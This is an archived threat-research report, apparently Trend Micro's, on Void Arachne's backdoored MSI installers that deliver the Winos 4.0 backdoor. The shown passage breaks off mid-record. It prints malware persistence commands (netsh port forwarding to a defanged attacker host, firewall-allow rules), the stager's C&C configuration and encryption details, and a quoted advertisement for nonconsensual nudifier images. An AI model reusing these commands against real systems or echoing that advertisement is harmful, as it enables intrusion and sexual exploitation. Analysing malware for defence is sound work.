{
	"id": "f16b0782-e026-470b-97e3-f637334d9391",
	"created_at": "2026-04-06T00:18:32.492454Z",
	"updated_at": "2026-04-10T03:29:06.994098Z",
	"deleted_at": null,
	"sha1_hash": "559df6500e93585b43c1e49e675474634efd3d61",
	"title": "Behind the Great Wall: Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 C\u0026C Framework",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 6634302,
	"plain_text": "Behind the Great Wall: Void Arachne Targets Chinese-Speaking Users\r\nWith the Winos 4.0 C\u0026C Framework\r\nPublished: 2024-06-19 · Archived: 2026-04-05 16:02:55 UTC\r\nReport highlights:\r\nWe recently discovered a new threat actor group that we dubbed Void Arachne. This group targets Chinese-speaking\r\nusers with malicious Windows Installer (MSI) files in a recent campaign. These MSI files contain legitimate software\r\ninstaller files for AI software and other popular software but are bundled with malicious Winos payloads.\r\nThe campaign also promotes compromised MSI files embedded with nudifiers and deepfake pornography-generating\r\nsoftware, as well as AI voice and facial technologies.\r\nThe campaign uses SEO poisoning tactics and social media and messaging platforms to distribute malware.\r\nThe malware installs a Winos backdoor during the installation process, which could lead to a full system\r\ncompromise.\r\nDue to strict government control in China, VPN services and public interest in this technology have notably\r\nincreased. And in this Void Arachne campaign, we’ve observed how threat actors are exploiting the heightened public\r\ninterest in software that can evade the Great Firewall and online censorship.\r\nIn early April, we discovered that a new threat actor group (which we call Void Arachne) was targeting Chinese-speaking\r\nusers. Void Arachne’s campaign involves the use of malicious MSI files that contain legitimate software installer files for\r\nartificial intelligence (AI) software as well as other popular software. The malicious Winos payloads are bundled alongside\r\nnudifiers and deepfake pornography-generating AI software, voice-and-face-swapping AI software, zh-CN (Simplified\r\nChinese) language packs, the simplified Chinese version of Google Chrome, and Chinese-marketed virtual private networks\r\n(VPNs), such as LetsVPN and QuickVPN. During the process of installation, a Winos backdoor is also installed, which\r\ncould also lead to full system compromise.\r\nDuring this campaign, we observed numerous malicious installer files being shared across several Telegram channels. We\r\nalso saw attacker-controlled web servers that distribute malicious files through search engine optimization (SEO) poisoning\r\nattacks. These MSI files act as backdoored installers, serving both the non-malicious software and the Winos 4.0 command-and-control (C\u0026C) framework implant, which could lead to a full system compromise. Winos (not to be confused with the\r\nWindows operating system) is a backdoor used by Chinese threat actors with an extensive array of capabilities for remotely\r\ncontrolling a compromised computer.\r\nAttack diagram\r\nWe observed multiple initial access vectors that the Void Arachne threat actor group uses to distribute malware across the\r\nweb and through social media platforms. These distribution methods include an infrastructure staged for SEO poisoning and\r\nmalicious package distribution across Chinese-language-themed Telegram channels.\r\nInitial access\r\nWe observed multiple initial access vectors that the Void Arachne threat actor group uses to distribute malware across the\r\nweb and through social media platforms. These distribution methods include an infrastructure staged for SEO poisoning and\r\nmalicious package distribution across Chinese-language-themed Telegram channels.\r\nSEO poisoning (T1608.006)\r\nFor this campaign, Void Arachne set up a web infrastructure that is used for SEO poisoning that deployed spear-phishing\r\nlinks (T1566.002) disguised as legitimate software installers to lure potential victims. These links are hosted on web servers\r\ndisguised as legitimate websites so that the Void Arachne threat group can proceed to make them rank high on search\r\nengines via SEO poisoning. \r\nhttps://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html\r\nPage 1 of 30\n\nFigure 2. An attacker-controlled website that hosts a malicious payload\r\nThese links contain MSI installers for common software targeting Chinese-speaking users such as Google Chrome, Chinese\r\nlanguage packs for popular software, and VPNs such as LetsVPN and 快連VPN (also known as Quick VPN or  Kuilian\r\nVPN). When these malicious MSI files or archive files are downloaded and executed, they would bootstrap the infection\r\nprocess. To the victim, it appears as if the intended software was installed. However, unbeknownst to them, additional\r\nmalware is installed that beacons back to the attacker’s C\u0026C server.\r\nBecause MSI files are bundled software installers, threat actors can include backdoors and additional malware within the file\r\nbundle that are executed without the end user’s knowledge during the installation process.\r\nIn this campaign, the Void Arachne group created subdomains of the domain webcamcn[.]xyz to act as C\u0026C servers for the\r\nvarious  MSI files. As the campaign progressed, various subdomains were added to this root domain.\r\nTargeting VPN-related technologies for spearphishing\r\nInternet connectivity in the People’s Republic of China is subject to strict regulation through a combination of legislative\r\nmeasures and technological controls collectively known as the Great Firewall of China. Due to strict government control,\r\nVPN services and public interest in this technology have notably increased. This has, in turn, enhanced threat actors' interest\r\nin exploiting the heightened public interest in software that can evade the Great Firewall and online censorship.\r\nFigure 3. VPN advertising services that can “overcome” the Great Firewall of China\r\nWe discovered that the VPN “快連VPN” is a common phishing and SEO poisoning vector used to target Chinese-speakers\r\nand the broader East Asian community.  We have evidence of multiple distinct Chinese-speaking threat actors creating spear-phishing links and using SEO poisoning tactics by bundling this VPN with malware that includes Gh0st RAT and its\r\nvariants.\r\nSpearphishing through Telegram\r\nWe observed several Telegram channels, some of which had tens of thousands of Chinese-speaking users, advertising\r\nmalicious archives and MSI files as an additional distribution method. The malicious packages are in what appear to be\r\nSimplified Chinese language packs for Telegram as well as various AI tools.\r\nVPN-related Telegram channels\r\nLike what’s being promoted in Void Arachne’s SEO poisoning campaign, we also observed the same malicious MSI files\r\nbeing shared in Chinese language-centric Telegram Channels. These channels are all related to VPN technology and the\r\nmalicious MSI files were shared across several Telegram channels. \r\nhttps://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html\r\nPage 2 of 30\n\nFigure 4. A pinned Telegram message containing a malicious MSI file embedded in a zip file\r\nThis is like other campaigns we’ve observed wherein after threat actors conduct SEO-poisoning tactics, they then share links\r\nto these malicious sites or upload related files on social media and messaging applications.\r\nMalicious Simplified Chinese language packs for Telegram\r\nA common malicious software package we observed is what appears to be a Telegram language pack for the Simplified\r\nChinese language. (Telegram does offer a translation of its app in Simple Chinese, which may be found here.)\r\nhttps://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html\r\nPage 3 of 30\n\nFigure 5. A malicious MSI file masquerading as a Simplified Chinese language pack for Telegram\r\nUsing infected language packs as an infection vector is an interesting method, especially for the Chinese language, which\r\nhas an estimated 1.3 billion native speakers. Some applications require language packs for a more localized user experience\r\nin regional markets, leaving these users potentially vulnerable to this kind of attack.\r\nNudifier AI technologies promoted on Telegram channels\r\nA concerning trend we have recently observed is the mass proliferation of nudifier applications that abuse AI to create  AI-generated nonconsensual deepfakenews- cybercrime-and-digital-threats pornography. These images and videos are often\r\nused in sextortionnews article schemes for further abuse, victim harassment, and financial gain.\r\nhttps://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html\r\nPage 4 of 30\n\nFigure 6. A deepfake pornographic video sample shared on the threat actor’s Telegram channel\r\nFigure 6 shows a screenshot of a video on the Void Arachne Telegram channel where a photo of a woman was used to\r\ngenerate a deepfake pornographic video of using AI technology.\r\nFigure 7. An infected nudifier application shared on the Void Arachne Telegram channel\r\nWe’ve observed that the threat actors pinned the malicious MSI file to the top of their Telegram channels to increase the\r\nchances of infecting users who are interested in using this type of technology.\r\nFigure 8. A pinned message on Void Arachne’s Telegram channel featuring a malicious MSI file for an AI-powered app\r\nThe malicious installer files are advertised on social media and Telegram channels and are intended to lure unsuspecting\r\nvictims, potentially even minors. Based on an initial Simplified Chinese to English translation of their advertisement via\r\nGoogle Translate, the malicious actors are also targeting young individuals who are still in school with their use of the\r\nphrase “female classmate.”\r\nJust have appropriate entertainment and satisfy your own lustful desires. Do not send it to the other party or harass the other\r\nparty. Once you call the police, you will be in constant trouble! AI takes off clothes, you give me photos and I will make\r\nhttps://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html\r\nPage 5 of 30\n\npictures for you. Do you want to see the female classmate you yearn for, the female colleague you have a crush on, the\r\nrelatives and friends you eat and live with at home? Do you want to see them naked? Now you can realize your dream, you\r\ncan see them naked and lustful for a pack of cigarette money.\r\nA Simplified Chinese to English translation of an advertisement that promotes nudifiers or deepfake pornography-generating\r\nsoftware on the threat actor’s Telegram channel\r\nVoid Arachne also advertised AI technologies that could be used for virtual kidnappingnews- cybercrime-and-digital-threats,\r\nwhich is a novel deception campaign that uses misinformation through AI voice-alternating technology to pressure victims\r\ninto paying ransom.\r\nVoice-altering and face-swapping AI technologies promoted on Telegram\r\nIn addition to fake nudifier applications, we saw additional channels advertising face-swapping and voice-changing\r\nsoftware. Like the rise of nudifiers and deepfake-generating applications, we have also observed the rise of AI-powered apps\r\nthat have face-swapping and voice-altering capabilities.\r\nFigure 9. A screenshot of the Void Arachne Telegram channel advertising face-swapping applications\r\nWe’ve found that malicious MSI files were shared and pinned on various AI video and voice manipulation Telegram\r\nchannels.\r\nFigure 10 shows a screen capture of a threat actor video posted on Void Arachne’s Telegram channel wherein the malicious\r\nactor can be seen using AI face- and voice-cloning technology on a WhatsApp call. Figure 12, on the other hand, shows a\r\nmalicious voice-altering and face-swapping AI app installer on Telegram. \r\nhttps://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html\r\nPage 6 of 30\n\nFigure 10. A screen capture of a video posted on a Telegram channel wherein the threat actor uses AI face- and\r\nvoice-cloning technology on a WhatsApp call\r\nhttps://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html\r\nPage 7 of 30\n\nFigure 11. An infected voice-changing and face-swapping AI app installer on Telegram\r\nTechnical analysis\r\nLetvpn MSI analysis\r\nName Letvpn.msi\r\nSHA256 fae4f96beda54a1ed4914537b0542182d3a020dd9db9d9995df37d303b88e6df\r\nSize 27.05 MB\r\nType Windows Installer\r\nThis section discusses our analysis of the malicious files associated with Void Arachne’s campaign, starting with the\r\nletvpn.msi file.\r\nThe malicious MSI file uses Dynamic Link Libraries (DLLs) during the installation process. These DLLs play a pivotal role\r\nduring runtime, facilitating various essential operations including property management within MSI packages, scheduling\r\ntasks, and configuring firewall rules.\r\nFigure 12. MSI binary table that shows embedded DLLs\r\nhttps://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html\r\nPage 8 of 30\n\nFigure 13. MSI action table\r\nThe MSI file performs several tasks, such as creating scheduled tasks and configuring firewall parameters. Specifically, we\r\nhave observed the creation and configuration of firewall rules via the OnFwConfig and OnFwInstall functions from\r\nNetFirewall.dll, which are designed to whitelist both inbound and outbound traffic associated with the malware for the\r\npublic network profile only.\r\nFigure 14. Firewall rule addition\r\nFigure 15. Firewall rule creation\r\nFigure 16 shows the configuration of the inbound firewall rule created to enable unrestricted access for the malware when\r\nconnected to public networks, ensuring that the malware can operate without interruption.\r\nhttps://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html\r\nPage 9 of 30\n\nFigure 16. Inbound firewall rule configuration\r\nFurthermore, letvpn.msi drops multiple hidden files, including the LetsPro.exe loader, within the designated directory path\r\nC:\\Program Files (x86)\\Common Files\\Microsoft Shared\\. Subsequently, it initiates the execution of the LetsPRO loader.\r\nFile name Size  MD5 hash Parent directory\r\n1 9996288 D82362C15DDB7206010B8FCEC7F611C5\r\nC:\\Program Files (x86)\\Common\r\nFiles\\Microsoft Shared\\VGX\\app-3.4.0\r\nLetsPRO.exe\r\n(Loader)\r\n40960  FE7AEDAB70A5A58EFB84E6CB988D67A4\r\nC:\\Program Files (x86)\\Common\r\nFiles\\Microsoft Shared\\VGX\\app-3.4.0\r\nLetsPRO.exe 247272 7BB188DFEE179CBDE884A0E7D127B074\r\nC:\\Program Files (x86)\\Common\r\nFiles\\Microsoft Shared\\VGX\r\nTable 1. Sample of files dropped by LetsPro.msi\r\nTrojan loader LetsPro.exe analysis\r\nName LetsPRO.exe\r\nSHA256 768881a43d2ffd9701bf2e241a1d59d8a0c116cf20e27a632a8b087bb81de409\r\nCompilation time 2024-02-03 3:59:52 a.m.\r\nSize 40.00 KB\r\nCompiler Microsoft Visual C/C++ (2003 v.7.1 (3052-9782)) [EXE32]\r\nhttps://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html\r\nPage 10 of 30\n\nType EXE\r\nLetsPro.exe is a trojan loader that decrypts, maps, and executes a second-stage payload in memory.  The loader first reads\r\nand loads the content of a file named “1”, with the following content structure:\r\nstruct payload_struct {\r\nuint32_t flag;      // 1 if the data is encrypted, 0 if it's plaintext/Memory clean up\r\nuint32_t fileSize;  // Size of the encrypted data in bytes\r\nchar encryptedData[]; // The encrypted payload\r\n};\r\nFigure 17. File 1 content structure\r\nIt then identifies the encrypted data section within the file. The initial part of the file structure contains a flag set to 1, which\r\nindicates encryption. The loader uses the Rivest Cipher 4 (RC4) algorithm with the key \"0x678E0B00\" to decrypt this data.\r\nAfter decryption, the payload, which is now executable code, is mapped into the process's memory space and executed.\r\nThe decryption key structure is defined as follows:\r\nstruct decryption_key_struct {\r\nuint32_t memory_cleanup; // Flag for memory cleanup after decryption\r\nuint32_t keySize;        // Size of the decryption key\r\nchar key[];              // Decryption key\r\n};\r\nThe following code snippet demonstrates the core part of the loader logic:\r\nhttps://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html\r\nPage 11 of 30\n\nFigure 18. LetsPro.exe core logic\r\nThe following snippet demonstrates the decrypted file 1 structure in memory:\r\nFigure 19. File 1 decrypted content structure in memory\r\nSecond-stage loader analysis\r\nSHA256 77c77e728b98a923bb057943d0b5765b79106c0378d72814cb3db69749abaebb\r\nSize 15.77 MB\r\nCompilation time 2024-05-11 08:02:23\r\nType DLL\r\nAfter the second-stage loader (file “1”) is executed and loaded into memory, the malware drops a Visual Basic Script\r\n(VBScript) designed to automate the creation of a scheduled task within Windows Task Scheduler to achieve persistence.\r\nThe VBScript file will create a new scheduled task and configure task settings to run when a user is logged on to execute a\r\nspecified batch file. Additionally, the malware creates a Windows service that starts with CreateSvc_ to execute the\r\nVBScript file. At the time of research, the batch file was not available.\r\nhttps://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html\r\nPage 12 of 30\n\nFigure 20. VBScript sets up a scheduled task and configures properties\r\nFigure 21. VBScript adds an action to the scheduled task to execute a BAT file\r\nFigure 22. Scheduled task for executing the BAT file\r\nhttps://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html\r\nPage 13 of 30\n\nFigure 23. Service creation for VBScript execution\r\nAfter that, the malware replicates the loader, VBScript, and the file “1” within the user directory.\r\nFile name Size   MD5 Parent directory\r\n1 9996288  D82362C15DDB7206010B8FCEC7F611C5\r\nC:\\Users\\%USERNAME%\\\u003cRandom\r\nDirectory Name\u003e\r\n792258.vbs 2405 CD95B5408531DC5342180A1BECE74757\r\nC:\\Users\\%USERNAME%\\\u003cRandom\r\nDirectory Name\u003e\r\nLetsPRO.exe 40960   FE7AEDAB70A5A58EFB84E6CB988D67A4\r\nC:\\Users\\%USERNAME%\\\u003cRandom\r\nDirectory Name\u003e\r\nTable 2. Sample of files dropped by 1\r\nThe malware also uses the netsh command to set up port forwarding and configure firewall rules named “Safe\u003cinteger\u003e” on\r\nthe victim’s machine, thereby whitelisting inbound and outbound traffic related to the malware for all network profiles.\r\nIt establishes a rule for IPv4-to-IPv4 port forwarding. Specifically, it designates port 443 as the listening port on the local\r\nmachine, where incoming connections will be received. It specifies a destination address\r\n(103.214.147.14[.]webcamcn[.]xyz), indicating where the forwarded traffic will be directed. Additionally, it designates port\r\n443 on the destination server as the port to which the incoming traffic will be forwarded. This configuration redirects traffic\r\nfrom the local machine's port 443 to the specified destination address and port.\r\nnetsh interface portproxy add v4tov4 listenport=443 connectaddress=103[.]214[.]147[.]14[.]webcamcn[.]xyz\r\nconnectport=443\r\nhttps://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html\r\nPage 14 of 30\n\nFigure 24. Configuring port forwarding\r\nnetsh advfirewall firewall add rule name=\"Safe1\" dir=in action=allow program=\" C:\\Program Files (x86)\\Common\r\nFiles\\Microsoft Shared\\VGX\\app-3.4.0\\LetsPRO.exe\"\r\nFigure 25. Configuring firewall rule\r\nFigure 26. List of created firewall rules\r\nFinally, the malware passes the execution to the Winos 4.0 stager in memory.\r\nWinos 4.0 C\u0026C framework overview\r\nThe final payload of this attack is the Winos 4.0 implant, which is written in C++ and targets the Windows platform. Winos\r\nhas features that include file management, distributed denial of service (DDoS)news article using TCP/UDP/ ICMP/HTTP,\r\nfull disk search, webcam control, and screen capturing. Additionally, it supports many functionalities including process\r\ninjection and microphone recording, system and service management, remote shell access, and keylogging functionalities,\r\nfurther enhancing its ability to control and monitor the infected system.\r\nhttps://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html\r\nPage 15 of 30\n\nFigure 27. Winos 4.0 operator panel\r\nThe Winos C\u0026C server is equipped with 23 internal plugins, each compiled in both 32- and 64-bit versions, to execute a\r\nvariety of tasks. Table 3 shows the complete list of these plugins, along with their respective SHA256 hashes:\r\nSimplified\r\nChinese\r\nmodule\r\nnames\r\nTranslated module\r\nnames\r\nSHA256 hash\r\n播放监听.dll Play monitor.dll 7ed8c7ea5e2feeadb1966f53c48ab3a580f53a4d20725031d764db7e962607a9\r\n查注册表.dll check registry.dll 49120dfcef430df1c90c9c370b92b969c876b9b4327d81eae720cd71fcd75b87\r\n差异屏幕.dll difference screen.dll 5f7e00017b16db29fa7cba60993d7af909ef41d3fe9d3f7ca9f693c1f7ef6d37\r\n代理映射.dll proxy mapping.dll 023822a8ad26f2d7330a2afa310ccf943058f2765b7cbc6975c51c144739b55f\r\n服务管理.dll\r\nservice\r\nmanagement.dll\r\n3ac0afec0ce29b69d57c54663c6e4fa6fee703696069cb5b8f00783b5504cf80\r\n高速屏幕.dll\r\nhigh-speed\r\nscreen.dll\r\nbc01cf528086de6a1b231dee01c1624cf58911b171904bf7a6b08ddfba661d83\r\n后台屏幕.dll\r\nBackground\r\nScreen.dll\r\n2066dd040fe020ca32e5ebfeeb4fa75094d3ac43155c83fe222f380d4940df42\r\n急速搜索.dll Rapid Search.dll 5759fc938f228579fc5e64e74cee083581a975d4054deb715c0f371b66b96263\r\n键盘记录.dll Keylogger.dll 976837663b25f793470f24925198b06e79a72ede014a84ba62311fadede5062f\r\n上线模块.exe\r\n(stager)\r\nOnline Module.dll 436499efe94c7a1bfefaa84c52f8187bffb3d4d1a49de1cbc8885e7807d11b42\r\nhttps://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html\r\nPage 16 of 30\n\n上线模块.dll\r\n(stager)\r\nOnline Module.dll 5684fc4f33c168519b2fdcae59cc3be2e6db1f0b0f3718524ef57e0e7423f59d\r\n视频查看.dll Video Viewing.dll 7a3841a5315c01df299d8844b62dc150b1c3e5b5ebe7547c1a211349879659af\r\n视频查看.dll\r\nVideo\r\nSurveillance.dll\r\n7a3841a5315c01df299d8844b62dc150b1c3e5b5ebe7547c1a211349879659af\r\n文件管理.dll\r\nFile\r\nManagement.dll\r\n5abc2006c7a3a27e033075ba881a668aba5e70797677ed2220f7ab9fb36fc927\r\n系统管理.dll\r\nSystem\r\nManagement.dll\r\n827ed4f36ea7032395bfa35da54c6e9d06d6633aa7396792e8511adf366c1fcc\r\n远程交谈.dll\r\nRemote\r\nCommunication.dll\r\nc61c8ded2a9481c2e50b4872c8f7bcd8ecc33997a6004e62aa06b60742f54e57\r\n远程终端.dll Remote Terminal.dll 409e09ac0fcf7d39044ef0b3eb798aea6dc0650e5214056760694c1340fc8488\r\n注入管理.dll\r\nInjection\r\nmanagement.dll\r\necf5394d78392b11daec1016c6b447f9da7eae69f7702ecf8c4d1d3f69e3fe64\r\n娱乐屏幕.dll\r\nEntertainment\r\nScreen.dll\r\n6ce947e21128687ed37f247e297f29609251deed934b7b5722d27f4a1f72a90e\r\n压力测试.dll\r\n(DDOS\r\nmodule)\r\nStress Test.dll 61d73a8920c41483d0832c9a5c5bc9f57ac5f71146a98faefc0cb4d988e77bab\r\n计划任务.dll Scheduled Tasks.dll 4791c23aff8a09061b76a05bb88ee37149995584a87aade236ea4eebab79ed1c\r\n登录模块.dll LoginModule.dll 16d3c176ca94c84b60e26981231bf59ebe75057ac10dd6f583ce65a3bed11dd0\r\n(shellcode) - b022e0f0b2ae9e27847cfc909bfcdbc89a732fcdde6e473443aaab2592a84910\r\nTable 3. Winos 4.0 internal plugins\r\nSimilar to Cobalt Strike and Sliver, Winos supports custom plugins that can be developed by a threat actor. This allows the\r\ntool to extend its capabilities and add custom functionality. During our investigation, we found the following external and\r\ncustom plugins for Winos 4.0 in the wild:\r\nPlugin name in Chinese Plugin name in English SHA256 hash\r\n删除360急速安全账号密\r\n码.dll\r\nDelete 360 Speed Security\r\nAccount Password.dll\r\n03669424bdf8241a7ef7f8982cc3d0cf56280a5804f042961f3c6a111252f\r\n提权-EnableDebugPrivilege.dllElevate Privileges-EnableDebugPrivilege.dll\r\n11a96c107b8d4254722a35ab9a4d25974819de1ce8aa212e12cae393549\r\n体积膨胀.dll Volume Expansion.dll 186bf42bf48dc74ef12e369ca533422ce30a85791b6732016de079192f4a\r\n提权ShellExecuteEx.dll\r\nElevate Privileges-ShellExecuteEx.dll\r\n202c378deb628a8104a1dd957bbd70b945beea8e11d55b9ce3e4787fbe4\r\n删除sogou账号密码.dll\r\nDelete Sogou Account\r\nPassword.dll\r\n2d1904dfc5a555b8bfdd4fa2db46d532e19479fd99affb169449ff2a2a4b4\r\n提权-RtlAdjustPrivilege.dll\r\nElevate Privileges-RtlAdjustPrivilege.dll\r\n47dfa891fc347187ba4ac161980a7e7c47cf656ddbf7b269a74c32a5a136\r\nhttps://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html\r\nPage 17 of 30\n\n删除ie账号密码.dll\r\nDelete IE Account\r\nPassword.dll\r\n538382dc7a7839f125ffe08a854512b78fc4a657697227e53f832ae566ca\r\n提权-CreateProcessInSession0.dllElevate Privileges-CreateProcessInSession0.dll\r\n616c7270a21ecc9ccd880e04563343e9ac53cce88a77244388dbb1fc7bfa\r\n写启动目录.dll\r\nWrite to Startup\r\nDirectory.dll\r\n61981a0324586ad83e6cb7015df91a6e4887537ad36a4674be82cb3cfcf5\r\n写注册表启动.dll Write to Registry Startup.dll d2e15264c786917a6cb194bf0cf586a69b8678c6d4d4c87cc14082d7b76\r\n删除自身.dll Delete Itself.dll 6ece1e12d50ade02bf424007a9b70b4a14580244a9a1f5cd32c0a129ec06\r\n内网主机扫描.dll\r\nInternal Network Host\r\nScan.dll\r\n6f5574d00ffce206525835f72ac083692a183e69114f1551b7ecb99dec3d\r\n解密数据.dll Decrypt Data.dll 6f923b94a614e61cbde73c5b09036b9482f3770c02161ecb0875dbb56bc\r\n删除chrome账号密码.dll\r\nDelete Chrome Account\r\nPassword.dll\r\nfbc23b84b2c83e99ab1c5cb7075bd5d26b55dde4afc06eddc0471c6d6b2\r\n写计划任务.dll Write Scheduled Task.dll 65ac9f036b1d8a02e4c9041eeafc230562088e57f2535bd194e8bf592e62\r\n删除telegram账号密码.dll\r\nDelete Telegram Account\r\nPassword.dll\r\n2d1904dfc5a555b8bfdd4fa2db46d532e19479fd99affb169449ff2a2a4b4\r\n删除qq账号密码.dll\r\nDelete QQ Account\r\nPassword.dll\r\nb71e6c4ff7c910dd666f442e98597f90bd2eb3fce4c8889af0ecc694f282b\r\n删除skype账号密码.dll\r\nDelete Skype Account\r\nPassword.dll\r\nb396bfd7bec043cf402e04fa810983c93c79d1a632fd4558098e68eb144a\r\nTable 4. Winos 4.0 external plugins\r\nWinos 4.0 stager analysis\r\nFile name 上线模块.dll (Online Module.dll)\r\nMagic PE32 executable (DLL)\r\nSHA256 2962bb303b949e4a0826c723ee4aee2df8cb0806653a8ca6daaa67fd06f37e6f\r\nCompiler Microsoft Visual C/C++\r\nCompilation time 2023-05-23 09:24:06\r\nSize 109 KB\r\nType DLL\r\nThe second stage loader discussed earlier executes the Winos stager payload, 上线模块.dll/exe (which translates to Online\r\nModule.dll/exe). This module can be generated in both EXE and DLL formats. In this campaign, the attacker delivers a DLL\r\nimplant. This module is responsible for downloading and executing the main implant, 登录模块.dll (which translates to\r\nLoginModule.dll), on an infected system.\r\nUpon execution, the stager reads and initializes its configuration. Notably, the configuration is in cleartext but is arranged in\r\nreverse order. The following is the fixed configuration setup:\r\n|p1:127.0.0.1|o1:443|t1:1|p2:103[.]214[.]147[.]14[.]webcamcn[.]xyz|o2:80|t2:1|p3:103[.]214[.]147[.]14[.]webcamcn[.]xyz|o3:80|t3:0|dd:1\r\n默认|bb:1.0|bz:2024. 4.18|jp:0|bh:0|ll:0|dl:0|sh:0|kl:0|bd:0|\r\nhttps://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html\r\nPage 18 of 30\n\nTable 5 contains the stager’s configuration values and their descriptions.\r\nConfig Description Value\r\np1 First C\u0026C address 127.0.0.1\r\no1 First C\u0026C port 443\r\nt1 Communication protocol TCP/UDP 1 (TCP)\r\np2 Second C\u0026C address 103[.]214[.]147[.]14[.]webcamcn[.]xyz\r\no2 Second C\u0026C port 80\r\nt2 Communication protocol TCP/UDP 1 (TCP)\r\np3 Third C\u0026C address: Backup address in case p1 and p2 fail 103[.]214[.]147[.]14[.]webcamcn[.]xyz\r\no3 Third port 80\r\nt3 Communication protocol TCP/UDP 0 (UDP)\r\ndd Implant execution delay in seconds 1\r\ncl C\u0026C communication interval (beaconing) in seconds 1\r\nfz Grouping 默认 (Default)\r\nbb Version 1.0\r\nbz Comment: Default value is implant generation time 2024. 4.18\r\njp Keylogger 0\r\nsx Anti-VM 0\r\nbh End bluescreen 0\r\nll Antitraffic monitoring 0\r\ndl Entry point 0\r\nsh Process daemon 0\r\nkl Process hollowing 0\r\nbd - 0\r\nTable 5. Winos 4.0 stager configuration values and descriptions\r\nTo communicate with its C\u0026C server, the malware first needs to generate an encryption key to secure the communication.\r\nTo generate this key, the malware calls the timeGetTime() Windows API function, which returns the system time in\r\nmilliseconds, and appends “00 00 00 00 ca 00” to it. The data that needs to be transferred is then encrypted with this key and\r\nappended after the key.\r\nFigure 28 is an example of an initial handshake between the stager and the C\u0026C server. The malware encrypts and sends the\r\nhardcoded value “04 00” to its C\u0026C server to indicate that this initial packet contains the key. The server then uses this\r\nsession key for future communications.\r\nhttps://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html\r\nPage 19 of 30\n\nFigure 28. Winos 4.0 stager initial packet–encryption key exchange\r\nThe encryption algorithm begins by preparing a block of data and a key, adjusting the buffer to ensure that there is sufficient\r\nspace to work with both. The key is then appended to the beginning of the data that needs to be encrypted. The algorithm\r\nproceeds with the encryption process, which involves a loop that processes each byte of data. For each byte, a specific byte\r\nfrom the key is selected and transformed by taking its modulus with a hardcoded value (0x1C8) and then adding another\r\nhardcoded value (0x36) to it. This transformed key is then used to XOR with the current byte of the data, resulting in the\r\nencrypted byte that replaces the original byte in the data. Every ten bytes, the algorithm resets the pointer to the beginning of\r\nthe key, ensuring that the key is reused cyclically.\r\nIt should be noted that, based on our analysis, the value 0x1C8 remained the same in all the samples used in this campaign\r\nand several other attacks. However, we have observed that some variants found in the wild use different values, such as\r\n0x7C5, indicating that this value might change from sample to sample. However, the value 0x36 remained the same in all\r\nthe variants we analyzed.\r\nFigure 29. Winos 4.0 stager data encryption\r\nNext, the C\u0026C server responds with a magic value of “04” and a unique 16-byte identifier in UTF-16 format. In some\r\nWinos variants, this identifier is the MD5 hash of the DLL module that will be downloaded. Figure 30 is an example of the\r\nC\u0026C server response to network traffic.\r\nFigure 30. C\u0026C server response with a unique identifier to the initial packet\r\nFigure 31 shows a decrypted packet data section.\r\nhttps://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html\r\nPage 20 of 30\n\nFigure 31. Decrypted C\u0026C response with a unique identifier to the initial packet\r\nThe stager then sends the next-stage payload plugin, named 登录模块.dll (LoginModule.dll), to the C\u0026C server.\r\nFigure 32. The Winos 4.0 stager sends the next stager module name to the C\u0026C server (encrypted packet)\r\nFigure 33 shows the decrypted packet data section.\r\nFigure 33. The Winos stager sends the next stager module name to the C\u0026C (cleartext)\r\nThe C\u0026C server response contains the following information:\r\nModule name\r\nModule hash\r\nBinary loader shellcode\r\nDLL module binary file\r\nThe stager then saves the decrypted C\u0026C server response (the plugin and its configuration) into the Windows Registry. It\r\nuses the name \"d33f351a4aeea5e608853d1a56661059\" and stores it under the key path HKEY_CURRENT_USER\\Console\\0\r\nhttps://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html\r\nPage 21 of 30\n\nfor 32-bit plugins or HKEY_CURRENT_USER\\Console\\1 for 64-bit plugins.\r\nFigure 34. The Winos stager store module is sent by the C\u0026C server to the registry.\r\nFinally, to execute the module, the stager locates the shellcode section within the response received from the C\u0026C server at\r\noffset 0xA44 and transfers control to the shellcode.\r\nFigure 35. Module shellcode DLL loader\r\nWinos main implant analysis\r\nFile name 登录模块.dll (LoginModule.dll)\r\nMagic PE32 executable (DLL)\r\nSHA256 78f86c3581ae893e17873e857aff0f0a82dcaed192ad82cd40ad269372366590\r\nCompiler Microsoft Visual C/C++\r\nCompilation time 2023-05-23 09:24:23 UTC\r\nhttps://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html\r\nPage 22 of 30\n\nSize 195.00 